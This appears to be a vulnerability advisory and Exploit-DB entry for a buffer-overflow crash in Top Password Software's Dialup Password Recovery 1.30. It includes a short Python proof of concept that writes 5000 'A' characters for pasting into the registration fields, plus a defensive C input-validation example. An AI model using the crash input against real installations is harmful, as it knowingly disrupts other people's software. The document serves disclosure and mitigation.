Vendor: Dialup Password Recovery
By: Antonio de la Piedra
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 119
Product Name: Dialup Password Recovery
Affected Version From: 1.30
Affected Version To: 1.30
Patch Exists: NO
Related CWE: N/A
CPE: a:top_password_software:dialup_password_recovery:1.30
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 SP1 32-bit
2020

Top Password Software Dialup Password Recovery 1.30 – Denial of Service (PoC)

When the contents of poc.txt are copied and pasted into the User Name / Registration Code input fields, the application crashes due to a buffer overflow.

Mitigation:

Input validation should be used to prevent buffer overflows.
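
The mitigation above, sketched as an added C example (not code from the advisory or from the vendor): each pasted field is length-checked against its destination buffer before any copy, and over-long input is rejected rather than truncated. The buffer sizes, the struct and the function names are assumptions, since the application's internals are not published.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limits: the real buffer sizes in the application are not published. */
#define USER_NAME_MAX 64
#define REG_CODE_MAX  32

enum field_status { FIELD_OK, FIELD_EMPTY, FIELD_TOO_LONG, FIELD_BAD_CHAR };
struct registration { char user_name[USER_NAME_MAX]; char reg_code[REG_CODE_MAX]; };

/* Check src (src_len bytes, possibly not NUL-terminated) against the
 * destination size, then copy. Over-long input is rejected, not truncated. */
static enum field_status copy_field(char *dst, size_t dst_size,
                                    const char *src, size_t src_len)
{
    const char *nul = src ? memchr(src, '\0', src_len) : NULL;
    size_t n = nul ? (size_t)(nul - src) : (src ? src_len : 0);
    if (n == 0) return FIELD_EMPTY;
    if (n >= dst_size) return FIELD_TOO_LONG;      /* keep room for the NUL */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)src[i];
        if (c < 0x20 || c == 0x7f) return FIELD_BAD_CHAR;  /* control bytes */
    }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return FIELD_OK;
}

/* Validate both fields into a scratch copy; commit only if both pass. */
static enum field_status set_registration(struct registration *out,
        const char *name, size_t name_len, const char *code, size_t code_len)
{
    struct registration tmp = {0};
    enum field_status st = copy_field(tmp.user_name, sizeof tmp.user_name, name, name_len);
    if (st != FIELD_OK) return st;
    st = copy_field(tmp.reg_code, sizeof tmp.reg_code, code, code_len);
    if (st != FIELD_OK) return st;
    *out = tmp;
    return FIELD_OK;
}

int main(void)
{
    char paste[5000];                    /* constructed input, same shape as poc.txt */
    struct registration r = {0};
    memset(paste, 'A', sizeof paste);
    return set_registration(&r, paste, sizeof paste, "CODE", 4) == FIELD_TOO_LONG ? 0 : 1;
}
```

In a Win32 dialog the same bound can also be set on the edit control itself with EM_LIMITTEXT, but the check before the copy is what protects the buffer.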

Exploit-DB raw data:

# Exploit Title: Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/DialupPRSetup.exe
# Version: 1.30
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc.txt into the
# User Name /  Registration Code input fields.

#!/usr/bin/python

poc = "A"*5000
file = open("poc.txt","w")
file.write(poc)
file.close()